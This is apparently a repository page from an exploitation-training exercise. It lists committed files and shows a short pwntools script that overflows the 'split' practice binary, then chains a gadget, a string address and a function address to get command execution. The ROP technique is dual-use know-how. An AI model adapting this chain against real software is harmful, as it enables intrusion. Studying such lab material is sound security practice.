ae586f332c
new file: x86_64/ret2win/core new file: x86_64/ret2win/exploit.py new file: x86_64/split/.gdb_history new file: x86_64/split/core new file: x86_64/split/core.split.25050 new file: x86_64/split/exploit.py new file: x86_64/split/fuckyou new file: x86_64/split/xaa
18 lines
357 B
Python
Executable File
18 lines
357 B
Python
Executable File
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
|
|
context.binary = "./split"
|
|
prog = process('./split')
|
|
payload = b''
|
|
|
|
for c in range(40): #originally 40
|
|
payload += b'a'
|
|
|
|
payload += p64(0x00000000004007c3)
|
|
payload += p64(0x0000000000601060) # usefulString
|
|
payload += p64(0x000000000040074b) # usefulFunction + offset
|
|
|
|
prog.sendline(payload)
|
|
prog.interactive()
|